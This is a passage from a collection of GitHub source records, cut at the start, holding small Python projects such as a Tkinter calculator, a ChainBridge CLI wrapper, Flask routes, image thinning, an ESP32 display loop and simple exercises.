3)\r\nbutton_add = Button(temp_calc, width = 11, pady = 10, borderwidth = 2, bg = '#B0B0B0', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = '+', command = lambda: button_click('+')); button_add.grid(row = 1, column = 3)\r\nbutton_subtract = Button(temp_calc, width = 11, pady = 10, borderwidth = 2, bg = '#B0B0B0', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = '-', command = lambda: button_click('-')); button_subtract.grid(row = 2, column = 3)\r\nbutton_multiply = Button(temp_calc, width = 11, pady = 10, borderwidth = 2, bg = '#B0B0B0', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = 'x', command = lambda: button_click('x')); button_multiply.grid(row = 4, column = 1)\r\nbutton_divide = Button(temp_calc, width = 11, pady = 10, borderwidth = 2, bg = '#B0B0B0', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = '%', command = lambda: button_click('%')); button_divide.grid(row = 4, column = 2)\r\nbutton_decimal = Button(temp_calc, width = 11, pady = 10, borderwidth = 2, bg = '#B0B0B0', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = '.', command = lambda: button_click('.')); button_decimal.grid(row = 3, column = 3)\r\nbutton_equal = Button(temp_calc, width = 11, pady = 9, borderwidth = 3, bg = '#9B9B9B', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = '=', command = result); button_equal.grid(row = 4, column = 3)\r\n\r\ntemp_operation = Label(calc, width = 73, font = ('Bahnschrift', '8'), bg = '#A1A1A1', fg = 'black', borderwidth = 1, relief = SUNKEN, anchor = E); temp_operation.grid(row = 5, column = 0, columnspan = 4)\r\n\r\nbase.mainloop()","repo_name":"parthratra11/Calculator-Tkinter","sub_path":"calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":11337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41064231172","text":"import subprocess\nfrom typing import List\nfrom web3 import HTTPProvider, Web3\nfrom utils.sys_mod import check_program\nfrom utils.resource_manager import available_contracts\nfrom utils.contracts_utils import load_abi\nfrom model.contract import ContractTypes\nfrom model.node import Node\nimport logging\nimport os\nimport json\n\nCONFIG_JSON_FILE = 'resources/config.json'\n\n\nclass CBWrapper():\n '''This is a simple wrapper to call cb-sol-cli functions from\n python. For config and params info check the official documentation at\n https://github.com/ChainSafe/chainbridge-deploy/blob/main/cb-sol-cli/README.md#usage\n This wrapper is also used to manage chainbridge relay.'''\n\n def __init__(self):\n self.cb_sol_cli = check_program(\"cb-sol-cli\")\n self.chainbridge = check_program(\"chainbridge\")\n if not self.cb_sol_cli:\n exit(\"No cb-sol-cli. 
Please install cb-sol-cli.\")\n        if not self.chainbridge:\n            print(\"Chainbridge relayer not installed\")\n        else:\n            if self.is_relayer_running():\n                logging.info(\"Bridge already running, it will not be started\")\n\n    def _basic_config(self, gateway: str, pkey: str, gas: int):\n        return ['cb-sol-cli', '--url', gateway, '--privateKey',\n                pkey, '--gasPrice', str(gas)]\n\n    def _run_command(self, params) -> subprocess.CompletedProcess:\n        logging.info(params)\n        out = subprocess.run(params, capture_output=True)\n        print(out.stdout.decode(\"UTF-8\"))\n        return out\n\n    def is_relayer_running(self):\n        if self.chainbridge:\n            params = ['pgrep', 'chainbridge']\n            out = subprocess.run(params, capture_output=True)\n            return not out.returncode\n        else:\n            return False\n\n    def start_relay(self, latest: bool = False, start_block: int = None):\n        if latest and start_block:\n            raise ValueError(\n                \"You can't specify both latest and from_block params.\")\n        params = ['nohup', 'chainbridge', '--config',\n                 os.path.abspath(CONFIG_JSON_FILE), '--verbosity', 'trace', '&']\n        if latest:\n            params.append(\"--latest\")\n        if start_block:\n            params.append(\"--startBlock\")\n            params.append(start_block)\n        logging.info(\"Starting chainbridge relay\")\n        subprocess.Popen(params, cwd=os.path.realpath('..'))\n\n    def stop_relay(self):\n        logging.info(\"Stopping chainbridge relay\")\n        params = ['pgrep', 'chainbridge']\n        relay = subprocess.Popen(params, stdout=subprocess.PIPE)\n        subprocess.run(['xargs', '-I{}', 'kill', \"{}\"], stdin=relay.stdout)\n\n    def deploy(self, gateway: str, pkey: str, gas: int, contracts_to_deploy: List[ContractTypes],\n               relayer_addresses: List[str], relayer_threshold: int, chain_id: int):\n        params = self._basic_config(gateway, pkey, gas)\n        params.append('deploy')\n        for contract in contracts_to_deploy:\n            # If the list contains an address it is used as bridge address\n            if \"0x\" in contract:\n                params += ['--bridgeAddress', contract]\n            else:\n                params += [\"--\"+contract]\n        if ContractTypes.BRIDGE in contracts_to_deploy:\n            params.append('--relayers')\n            params += relayer_addresses\n        params += ['--relayerThreshold',\n                   str(relayer_threshold), \"--chainId\", str(chain_id)]\n        return self._run_command(params)\n\n    def register_resource(self, gateway: str, pkey: str, gas: int, bridge_addr: str,\n                          handler_addr: str, resource_id: str, target_contract: str):\n        params = self._basic_config(gateway, pkey, gas)\n        params.insert(1, 'bridge')\n        params.insert(2, 'register-resource')\n        params += ['--bridge', bridge_addr, '--handler', handler_addr, '--resourceId', resource_id,\n                   '--targetContract', target_contract]\n        return self._run_command(params)\n\n    def burnable(self, gateway: str, pkey: str, gas: int, bridge_addr: str,\n                 handler_addr: str, target_contract: str):\n        params = self._basic_config(gateway, pkey, gas)\n        params.insert(1, 'bridge')\n        params.insert(2, 'set-burn')\n        params += ['--bridge', bridge_addr, '--handler',\n                   handler_addr, '--tokenContract', target_contract]\n        return self._run_command(params)\n\n    def add_minter(self, gateway: str, pkey: str, gas: int, type: ContractTypes, minter: str, target_contract: str):\n        params = self._basic_config(gateway, pkey, gas)\n        if type == ContractTypes.ERC20:\n            params.insert(1, 'erc20')\n            params += ['--erc20Address', target_contract]\n        elif type == ContractTypes.ERC721:\n            params.insert(1, 'erc721')\n            params += ['--erc721Address', target_contract]\n        params.insert(2, 'add-minter')\n        params += ['--minter', minter]\n        return self._run_command(params)\n\n    def approve(self, gateway: str, pkey: str, 
gas: int, type: ContractTypes, amount: int, target: str,\n recipient: str):\n params = self._basic_config(gateway, pkey, gas)\n if type == ContractTypes.ERC20:\n params.insert(1, \"erc20\")\n params += ['--amount', str(amount), '--erc20Address', target]\n elif type == ContractTypes.ERC721:\n params.insert(1, \"erc721\")\n params += ['--id', hex(amount), '--erc721Address', target]\n params.insert(2, 'approve')\n params += ['--recipient', recipient]\n return self._run_command(params)\n\n # This is used for the patched version of the bridge\n def manual_deposit(self, gateway: str, chain_id: int, pkey: str, gas: int, amount: int,\n bridge: str, token_addr: str, resource_id: str):\n w3 = Web3(HTTPProvider(gateway))\n account = w3.eth.account.from_key(pkey)\n abi = load_abi(\"crosscoin/build/contracts/BridgeWithdrawPatch.json\")\n contract = w3.eth.contract(address=bridge, abi=abi)\n # Fire deposit transaction\n token_addr = w3.toBytes(\n hexstr=token_addr).rjust(32, b'\\0')\n user_addr = w3.toBytes(\n hexstr=account.address).rjust(32, b'\\0')\n amount = w3.toBytes(\n w3.toWei(1, \"ether\")).rjust(32, b'\\0')\n data = token_addr + user_addr + amount\n fee_data = w3.toBytes(0).rjust(32, b'\\0')\n t_dict = {\"chainId\": w3.eth.chain_id,\n \"nonce\": w3.eth.get_transaction_count(account.address, 'pending'),\n \"gasPrice\": w3.toWei(10,\"gwei\"),\n \"gas\": gas}\n tx = contract.functions.deposit(\n chain_id, w3.toBytes(hexstr=resource_id), data, fee_data).buildTransaction(t_dict)\n signed_tx = w3.eth.account.sign_transaction(tx, account.key)\n tx_hash = w3.eth.send_raw_transaction(\n signed_tx.rawTransaction)\n logging.info(account.address + ' is depositing ' + str(data) + ' on chain ' + str(\n t_dict['chainId']) + \" tx_hash \" + tx_hash.hex())\n receipt = w3.eth.wait_for_transaction_receipt(tx_hash)\n print(\"root update tx_receipt: \" + str(receipt))\n\n def deposit(self, gateway: str, pkey: str, gas: int, type: ContractTypes, amount: int, dest: int,\n bridge: str, recipient: str, resource_id: str):\n params = self._basic_config(gateway, pkey, gas)\n if type == ContractTypes.ERC20:\n params.insert(1, \"erc20\")\n params += ['--amount', str(amount)]\n elif type == ContractTypes.ERC721:\n params.insert(1, \"erc721\")\n params += ['--id', hex(amount)]\n params.insert(2, 'deposit')\n params += ['--dest', str(dest), '--bridge', bridge,\n '--recipient', recipient, '--resourceId', resource_id]\n return self._run_command(params)\n\n def balance(self, gateway: str, type: ContractTypes, address: str, resource: str):\n params = ['cb-sol-cli']\n if type == ContractTypes.ERC20:\n params += ['erc20', 'balance', '--address',\n address, '--erc20Address', resource]\n elif type == ContractTypes.ERC721:\n params += ['erc721', 'owner', '--erc721Address',\n address, '--id', resource]\n params += ['--url', gateway]\n self._run_command(params)\n\n def update_config_json(self, endpoint: Node, type):\n logging.info(\"Updating chainbridge conf.\")\n if self.is_relayer_running():\n self.stop_relay()\n chain_id = endpoint.chain_id\n with open(CONFIG_JSON_FILE, 'r+') as f:\n jsonfile = json.load(f)\n contracts = available_contracts(chain_id, type)\n has_chain = False\n # we search for the right chain config json object in the whole list\n for i in range(len(jsonfile['chains'])):\n if jsonfile['chains'][i]['id'] == str(chain_id):\n has_chain = True\n # Node endpoint may be changed!\n jsonfile['chains'][i]['endpoint'] = endpoint.node_endpoint\n # For each contract available in the chain we update the address on the json\n # so 
it makes no difference if we used an erc20/721/generic handler contract\n                    for contract in contracts.values():\n                        if contract.type == 'erc20' or contract.type == 'erc721':\n                            # The config file does not contain the erc20/721 endpoint\n                            # so we skip them\n                            pass\n                        else:\n                            jsonfile['chains'][i]['opts'][contract.type] = contract.address\n            if not has_chain:\n                # We configure the second chain item as a new chain\n                jsonfile['chains'][1]['id'] = str(chain_id)\n                jsonfile['chains'][1]['endpoint'] = endpoint.node_endpoint\n                for contract in contracts.values():\n                    if contract.type == 'erc20' or contract.type == 'erc721':\n                        # The config file does not contain the erc20/721 endpoint\n                        # so we skip them\n                        pass\n                    else:\n                        jsonfile['chains'][1]['opts'][contract.type] = contract.address\n            f.seek(0)\n            f.truncate()\n            json.dump(jsonfile, f, indent=4)\n        self.start_relay()\n","repo_name":"NorwegianGoat/bc_connector","sub_path":"scripts/utils/cb_wrapper.py","file_name":"cb_wrapper.py","file_ext":"py","file_size_in_byte":10531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"30360048851","text":"from flask import (\n    render_template,\n    request,\n    jsonify,\n    make_response,\n    Blueprint,\n    redirect,\n    url_for\n)\nfrom .data_worker import (\n    read_df,\n    load_orders,\n    load_delivery,\n    load_sales,\n    calculate_balance,\n    orders_worker\n)\n\n# here we create the blueprint; it is later registered in manage.py at the project root\n# the name is senor, the prefix is /senor, i.e. in the application all of its routes are handled as /senor/*\n# , but the prefix is omitted in this module's routes\nsims = Blueprint('sims', __name__, url_prefix='/sims', static_folder='static', template_folder='templates')\n\n\n# render the page; it is available at http://localhost:5000/sims/\n@sims.route('/', methods=['GET', 'POST'])\ndef index():\n    if request.method == 'GET':\n        orders_info, delivery_info, sales_info = get_values_for_sims_page()\n        return render_template('sims.html', title='SberMobile SIM cards',\n                               orders_info=orders_info,\n                               delivery_info=delivery_info,\n                               sales_info=sales_info)\n\n    if request.form.get('orders') == 'on':\n        print('starting orders load')\n        load_orders(path_to_file = r'\\\\Braga101\\Vol2\\SUDR_PCP_BR\\SIMS\\sources\\orders.csv')\n\n    if request.form.get('delivery') == 'on':\n        print('starting deliveries load')\n        load_delivery(delivery_type=0, path_to_file=r'\\\\Braga101\\Vol2\\SUDR_PCP_BR\\SIMS\\sources\\delivery.xlsx')\n        load_delivery(delivery_type=1, path_to_file=r'\\\\Braga101\\Vol2\\SUDR_PCP_BR\\SIMS\\sources\\report.xls')\n\n    if request.form.get('sales') == 'on':\n        print('starting sales load')\n        load_sales()\n\n    if request.form.get('balances') == 'on':\n        print('starting VSP balances load')\n        calculate_balance(save_db=True, check_last_balance=False)\n\n    if request.form.get('orders_worker') == 'on':\n        print('starting check_orders update')\n        orders_worker()\n\n    return redirect(url_for('sims.index'))\n\n\n# function that catches requests from the page, the ones sent via fetch\n@sims.route('/run_script', methods=['POST'])\ndef run_script():\n    # get the request payload\n    req = request.get_json(force=True)\n\n    # the request payload is used when calling the function. 
The function must be imported and called below\n    # your code is here\n\n    # build the response to render on the page\n    res = make_response(jsonify('All OK'), 200)\n\n    return res\n\n\ndef get_values_for_sims_page():\n    orders_info = read_df(\"\"\"\n    select \n        sum(case when dttm >= date('now', 'start of month') then 1 else 0 end) orders_current,\n        sum(case when dttm >= date('now', 'start of month', '-1 month') and dttm < date('now', 'start of month') then 1 else 0 end) orders_prev,\n        strftime('%d.%m.%Y', max(dttm)) dt_order\n    from sims_orders\n    \"\"\")\n    orders_info = list(orders_info.values[0])\n    delivery_info = read_df(\"\"\"\n    select \n        sum(case when dt >= date('now', 'start of month') then 1 else 0 end) delivery_current,\n        sum(case when dt >= date('now', 'start of month', '-1 month') and dt < date('now', 'start of month') then 1 else 0 end) delivery_prev,\n        strftime('%d.%m.%Y', max(dt)) dt_delivery\n    from sims_delivery\n    \"\"\")\n    delivery_info = list(delivery_info.values[0])\n\n    sales_info = read_df(\"\"\"\n    select \n        strftime('%d.%m.%Y', max(dt)) dt_sales\n    from sims_expense\n    \"\"\")\n    sales_info = list(sales_info.values[0])\n\n    return orders_info, delivery_info, sales_info","repo_name":"xandrzoll/portal_pcp","sub_path":"apps/sims/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"39529693853","text":"a=list(input().strip().split())\na=[int(i) for i in a]\nmaxsof=0\nmaxend=0\nmaxtot=0\nfor i in range(len(a)):\n    maxsof+=a[i]\n    if maxsof<0:\n        maxsof=0\n    if maxend<maxsof:\n        maxend=maxsof\n    if a[i]>=0:\n        maxtot+=a[i]\nprint(maxend,maxtot)","repo_name":"Shivam60/hackerrank-questions","sub_path":"max_subarr.py","file_name":"max_subarr.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17455717856","text":"from chainer.backends import cuda\n\n\ndef sample_without_replacement(p_log):\n    \"\"\"\n    Samples a permutation with log-probabilities\n\n    :param p_log: The log-probabilities (each row's exp(log_p) needs to sum up\n        to one)\n    :type p_log: chainer.Variable\n\n    :param rng: The random number generator (default is to use global random\n        number generator in either cupy or numpy)\n    :type rng: numpy.random.RandomState|cupy.random.RandomState|None\n\n    :return: A random permutation, sampled without replacement with proportional\n        probabilities\n    :rtype: chainer.Variable\n    \"\"\"\n    xp = cuda.get_array_module(p_log)\n\n    # This uses reservoir sampling, which comes down to doing\n    # Uniform(0, 1) ^ (1 / p) and then sorting by the resulting values. 
The\n # following implementation is a numerically stable variant that operates in\n # log-space and uses GPU-accelerated operations.\n u = xp.random.uniform(0.0, 1.0, p_log.shape)\n r = xp.log(-xp.log(u)) - p_log.data\n s = xp.argsort(r, axis=1)\n return s\n","repo_name":"rjagerman/chainerltr","sub_path":"chainerltr/functions/sampling.py","file_name":"sampling.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"21970767280","text":"#Piedra papel o tijera\nimport random\nplayerName = input()\nplayerNumber = int(input())\ncomputerName = input()\ncomputerNumber = int(input())\n\n \n\ndef despliega_tiro(jugador, tiro):\n if tiro == 1:\n print(jugador + \" tiro Piedra\")\n elif tiro == 2:\n print(jugador + \" tiro Papel\")\n else:\n print(jugador + \" tiro Tijera\")\n \ndef piedra_papel_tijera(tJ, tC):\n despliega_tiro(playerName, playerNumber)\n despliega_tiro(computerName, computerNumber)\n \n if (tJ == 1 and tC == 3) or (tJ == 2 and tC == 1) or (tJ == 3 and tC == 2):\n print(\"ganaste\")\n elif tJ == 1 and tC == 2 or (tJ == 2 and tC == 3) or (tJ == 3 and tC == 1):\n print(\"perdiste\")\n elif tJ == tC:\n print('empate')\n else:\n print('enter valid numbers')\n \n \npiedra_papel_tijera(playerNumber, computerNumber) \n \n","repo_name":"Abrahamcepedao/ITC","sub_path":"Semestre1/Pensamiento computacional/archivos py/piedraPapelTijera.py","file_name":"piedraPapelTijera.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3049802149","text":"from datetime import datetime\nfrom image_util import compute_image_hash\nfrom typing import Dict, Optional\n\n\nGALLERY_URL = \"https://www.reddit.com/gallery/\"\nDATETIME_FMT = \"%d/%m/%y %H:%M\"\n\n\nclass FoodPost:\n # Attributes\n # id - the submission ID given by Reddit\n # title - the Post title\n # post_url - the permalink for this post\n # image_url - the url for the associated image of a submission\n def __init__(self, **kwargs):\n self.id = kwargs.get(\"id\")\n self.title = kwargs.get(\"title\")\n self.post_url = kwargs.get(\"permalink\")\n self.image_url = kwargs.get(\"image_url\")\n self.img_hash = kwargs.get(\"img_hash\") # for testing\n self.color = 0xDB5172\n ts = kwargs.get(\"created_utc\")\n if ts is not None and ts > 0:\n self.date_posted = datetime.fromtimestamp(ts)\n else:\n self.date_posted = None\n\n def __str__(self):\n return f\"{self.title} : {self.post_url}\"\n\n def __repr__(self):\n return self.__str__()\n\n # Transforms this FoodPost object into the discord Embed dictionary that\n # should be posted.\n def to_embed(self) -> Dict:\n data = {\n \"title\": FoodPost.truncate(self.title),\n \"description\": self.post_url,\n \"color\": self.color,\n }\n if self.image_url is not None and self.image_url != \"\":\n data[\"image\"] = {\"url\": self.image_url}\n return data\n\n def image_hash(self) -> Optional[int]:\n if self.img_hash is None:\n self.img_hash = compute_image_hash(self.image_url)\n return self.img_hash\n\n def to_json(self) -> Dict:\n \"\"\"\n Transform the submission and it's hash into a Python\n dictionary, so that it can be converted into a JSON string\n that gets persisted in the Redis cache as part of an array.\n\n Example:\n {\n \"id\": \"foo-bar-baz\",\n \"hash\": \"1234567890\",\n \"title\" \"Something here\",\n \"date\": \"2022-01-01\",\n }\n @param img_hash the hash of the byte array of the Image from PIL\n 
@return dictionary to be persisted into the Redis cache.\n \"\"\"\n return {\n \"id\": self.id,\n \"hash\": str(self.image_hash()),\n \"title\": self.title,\n \"date\": self.date_posted.strftime(DATETIME_FMT),\n }\n\n # Given a Reddit submission title, truncate the title if it's too long\n # https://github.com/SaxyPandaBear/discord-food-bot/issues/28\n # If the title is not too long, return the input unchanged\n @staticmethod\n def truncate(title: str) -> str:\n if title is None:\n return None\n\n # truncate with an ellipsis, so we need some leeway\n if len(title) > 256:\n return title[:253] + \"...\" # take first 253 characters\n return title\n\n # Take a Reddit submission object, and transform that into a FoodPost\n @staticmethod\n def from_submission(submission):\n sub_id = submission.id\n url = FoodPost.derive_image_url(submission)\n # permalink does not give the full URL, so build it instead.\n permalink = f\"https://www.reddit.com{submission.permalink}\"\n title = submission.title\n created_utc = submission.created_utc\n return FoodPost(\n id=sub_id,\n title=title,\n image_url=url,\n permalink=permalink,\n created_utc=created_utc,\n )\n\n @staticmethod\n def derive_image_url(submission) -> Optional[str]:\n \"\"\"\n A submission can point to a gallery instead of a direct link to\n an image. This gallery URL does not render properly on Discord in the\n embed. Have to pick one of the images ourselves, and then use that\n to display in this scenario.\n @param submission The submission object from PRAW\n \"\"\"\n if submission is None or submission.url is None:\n return None\n\n url = submission.url\n if url.startswith(GALLERY_URL):\n # https://github.com/SaxyPandaBear/my-webhooks/issues/4\n # If the submission points to a Reddit gallery, need to pick one\n # of the images in the gallery to render in the Discord embed.\n # The set of images are defined in the \"media_metadata\" attribute\n # of the submission.\n images: Dict = submission.media_metadata\n if images is None or len(images) < 1:\n return None\n # Unsure if ordering is guaranteed, so in order to be\n # deterministic, ensure ordering on our end by sorting.\n ids = sorted(images) # this sorts by key, and only returns keys.\n url = f\"https://i.redd.it/{ids[0]}.jpg\"\n\n query_param_idx = url.find(\"?\")\n if query_param_idx >= 0:\n url = url[:query_param_idx]\n return url\n","repo_name":"SaxyPandaBear/food-pics","sub_path":"food_post.py","file_name":"food_post.py","file_ext":"py","file_size_in_byte":4899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2302463663","text":"import sys\nimport PIL\nfrom PIL import Image\nimport numpy as np\nfrom flask import Flask\n\napp = Flask('__main__')\nsys.setrecursionlimit(50000)\n\ndef thinning(image):\n np.set_printoptions(threshold=np.nan)\n im = Image.open(app.root_path + '/' + image)\n image = im.load()\n h, w = im.size\n #quantize image to 0 and 1 value\n quantitized_image = np.zeros((w + 2, h + 2), dtype=int)\n for i in range(w):\n for j in range(h):\n rgb_image = image[j, i]\n if(isinstance(rgb_image, int)):\n grayscale = 0\n elif (len(rgb_image) == 4):\n if (rgb_image[3] > 0):\n grayscale = (rgb_image[0] + rgb_image[1] + rgb_image[2]) / 3\n else:\n grayscale = 9999\n else:\n grayscale = (rgb_image[0] + rgb_image[1] + rgb_image[2]) / 3\n\n if(grayscale < 127):\n quantitized_image[i + 1, j + 1] = 1\n \n changing1 = changing2 = 1 # the points to be removed (set as 0) \n while changing1 or changing2: # iterates until no 
further changes occur in the image\n # Step 1\n changing1 = []\n rows, columns = quantitized_image.shape # x for rows, y for columns\n for x in range(1, rows - 1): # No. of rows\n for y in range(1, columns - 1): # No. of columns\n P2,P3,P4,P5,P6,P7,P8,P9 = n = neighbours(x, y, quantitized_image)\n if (quantitized_image[x][y] == 1 and # Condition 0: Point P1 in the object regions \n 2 <= sum(n) <= 6 and # Condition 1: 2<= N(P1) <= 6\n transitions(n) == 1 and # Condition 2: S(P1)=1 \n P2 * P4 * P6 == 0 and # Condition 3 \n P4 * P6 * P8 == 0): # Condition 4\n changing1.append((x,y))\n for x, y in changing1: \n quantitized_image[x][y] = 0\n # Step 2\n changing2 = []\n for x in range(1, rows - 1):\n for y in range(1, columns - 1):\n P2,P3,P4,P5,P6,P7,P8,P9 = n = neighbours(x, y, quantitized_image)\n if (quantitized_image[x][y] == 1 and # Condition 0\n 2 <= sum(n) <= 6 and # Condition 1\n transitions(n) == 1 and # Condition 2\n P2 * P4 * P8 == 0 and # Condition 3\n P2 * P6 * P8 == 0): # Condition 4\n changing2.append((x,y)) \n for x, y in changing2: \n quantitized_image[x][y] = 0\n\n\n return quantitized_image\n\ndef neighbours(x,y,image):\n \"Return 8-neighbours of image point P1(x,y), in a clockwise order\"\n img = image\n x_1, y_1, x1, y1 = x-1, y-1, x+1, y+1\n return [ img[x_1][y], img[x_1][y1], img[x][y1], img[x1][y1], # P2,P3,P4,P5\n img[x1][y], img[x1][y_1], img[x][y_1], img[x_1][y_1] ] # P6,P7,P8,P9\n\ndef transitions(neighbours):\n \"No. of 0,1 patterns (transitions from 0 to 1) in the ordered sequence\"\n n = neighbours + neighbours[0:1] # P2, P3, ... , P8, P9, P2\n return sum( (n1, n2) == (0, 1) for n1, n2 in zip(n, n[1:]) ) # (P2,P3), (P3,P4), ... , (P8,P9), (P9,P2)","repo_name":"betheazdavida/image-processing-course","sub_path":"5/thinning.py","file_name":"thinning.py","file_ext":"py","file_size_in_byte":3274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33728517958","text":"from errors import InvalidAccountType\n\nclass Account:\n ACC_TYPES = (\"SAVINGS\", \"CREDIT\")\n\n def __init__(self, iban, currency, type) -> None:\n if type not in Account.ACC_TYPES:\n raise InvalidAccountType()\n\n self.iban = iban\n self.currency = currency\n self.type = type\n","repo_name":"CharlieScarver/TU-Introduction-to-Programming","sub_path":"Sem-07/bank-task/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"23207892895","text":"import gdown\nimport tarfile\n\nfrom pathlib import Path\n\nfrom lib.config import DATASET_CHOICE, DATASET_URL\n\n__all__ = [\"run\"]\n\n\ndef run(**kwargs):\n \"\"\"\n Downloads the Drone Deploy Segmentation Dataset.\n\n Uses the following configuration settings:\n - DATASET_CHOICE: dataset to be downloaded\n - DATASET_URL: download url\n \"\"\"\n\n # Download the archive file, if it isn't downloaded already\n filename = Path(f\"downloads/{DATASET_CHOICE}.tar.gz\")\n filename.parent.mkdir(parents=True, exist_ok=True)\n\n if filename.exists():\n print(\n f\"Archive file of dataset '{DATASET_CHOICE}' already exists ('{str(filename)}').\"\n )\n else:\n print(f\"Downloading archive file of dataset '{DATASET_CHOICE}'\")\n gdown.download(DATASET_URL, str(filename), quiet=False)\n\n # Extract the archive file, if it isn't extracted already\n dataset_directory = Path(f\"data/{DATASET_CHOICE}\")\n\n if dataset_directory.exists():\n print(\n f\"Extracted dataset '{DATASET_CHOICE}' 
already exists ('{str(dataset_directory)}').\"\n )\n else:\n print(f\"Extracting dataset '{DATASET_CHOICE}'...\")\n dataset_directory.mkdir(parents=True, exist_ok=True)\n with tarfile.open(str(filename), \"r:gz\") as tar:\n tar.extractall(str(dataset_directory.parent))\n","repo_name":"kelvindecosta/heimdall","sub_path":"lib/dataset/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"12862497311","text":"# Daniel Holmes\n# 2019/9/19\n# routes.py\n# backend to make predictions\n\nfrom flask import request\nfrom app import app\nfrom app.processing import pipeline\n\n\n@app.route('/classify/group', methods=['POST'])\ndef classify_one():\n \"\"\" classify one group of text \"\"\"\n group = request.get_json(force=True)['group']\n sentences, predictions = pipeline(group)\n\n return {\n 'sentences': sentences,\n 'predictions': predictions\n }\n\n\n@app.route('/classify/groups', methods=['POST'])\ndef classify_many():\n \"\"\" classify many groups of text \"\"\"\n groups = request.get_json(force=True)['groups']\n predictions = []\n\n for group in groups:\n sentences, group_predictions = pipeline(group)\n\n predictions.append({\n 'sentences': sentences,\n 'predictions': group_predictions\n })\n\n return {'predictions': predictions}\n","repo_name":"danielholmes839/Get-The-Facts-Out","sub_path":"backend/app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25416073552","text":"import time\nt0= time.time()\nimport wifi_esp32\nimport display\n\n# initialize tft display\ntft = display.TFT()\ntft.tft_setspeed(4000000)\ntft.init(tft.ST7789,bgr=False,rot=tft.PORTRAIT, miso=17,backl_pin=4,backl_on=1, mosi=19, clk=18, cs=5, dc=16, color_bits=tft.COLOR_BITS16, splash=False)\ntft.setwin(52,40,240, 320)\n#tft.set_bg(0xff00)\n#tft.clear()\nt1= time.time()\n\nimport page\nt2= time.time()\nfrom lcd import LCD\nt3= time.time()\nimport gpio_esp32\nt4= time.time()\n\nlcd = LCD(False)\nperiod = .1\nsleeptime = time.time()\n\nimport machine, micropython\n#machine.freq(80000000)\n\nvbatt = machine.ADC(34)\nvbatt.atten(3) # only one that works!!\n\ngpio_esp32.init(lcd)\n\nt5= time.time()\nprint ('loaded', t5-t0, ':',t1-t0, t2-t1, t3-t2, t4-t3, t5-t4)\n\nsleepmode = 0\nwhile True:\n import gc\n gc.collect()\n #micropython.mem_info()\n\n v = vbatt.read() * 0.0017728937728937728\n if not lcd.battery_voltage:\n lcd.battery_voltage = v\n lp = .02\n lcd.battery_voltage = (1-lp)*lcd.battery_voltage + lp*v\n\n gpio_esp32.poll(lcd)\n if any(list(map(lambda key : key.count, lcd.keypad))):\n sleeptime = time.time()\n if sleepmode:\n tft.backlight(True)\n if sleepmode > 1:\n machine.freq(240000000)\n sleepmode = 0\n \n t0 = time.time()\n try:\n lcd.poll()\n except Exception as e:\n print('lcd poll failed', e)\n t1 = time.time()\n gpio_esp32.poll(lcd)\n t2 = time.time()\n \n if time.time() - sleeptime > 20:\n #print('sleep blank screen')\n tft.backlight(False)\n #esp.sleep_type(esp.SLEEP_MODEM) # SLEEP_LIGHT\n sleepmode = 1\n\n if time.time() - sleeptime > 60:\n if wifi_esp32.station.isconnected():\n #print('sleep wifi off')\n #wifi_esp32.station.active(False)\n pass\n #machine.freq(80000000)\n sleepmode = 2\n\n #if wifi_esp32.station.isconnected():\n wifi_esp32.poll(lcd.client)\n\n if time.time() - sleeptime > 300:\n print('sleep power down')\n 
machine.deepsleep()\n\n t3 = time.time()\n dt = t3-t0\n s = period - dt\n if s <= .01:\n s = .01\n #print('sleep ', t1-t0, t2-t1, t3-t2, s*100/(t3-t0+s), '%')\n\n time.sleep(s)\n","repo_name":"FredericGuilbault/pypilot","sub_path":"hat/lcd_esp32.py","file_name":"lcd_esp32.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"5219588516","text":"necesita_calculo = input(\"¿Tienes que hacer alguna conversión, hoy (si / no) :?\")\n\nwhile necesita_calculo == \"si\":\n\n escala_a_convertir = input(\"¿Que quieres conocer, celsius o farenheit?\")\n temoeratura_a_convertir = int(input(\"Cuál es la temperatura que quieres convertir?\"))\n\n if escala_a_convertir == \"celsius\":\n resultado_en_celsius = (temoeratura_a_convertir - 32)/1.8\n print(\"La temperatura en Celsius es {} grados\".format(resultado_en_celsius))\n necesita_calculo = input(\"¿Necesitas otro cálculo?\")\n\n elif escala_a_convertir == \"farenheit\":\n resultado_en_farenheit = (temoeratura_a_convertir *1.8) +32\n print(\"La temperatura en Farenheit es de {} grados\".format(resultado_en_farenheit))\n necesita_calculo = input(\"¿Necesitas otro cálculo?\")\n else:\n print(\"No has introducido bien los datos, mamonazo\")\n\nprint(\"Gracias por usar este convertidor 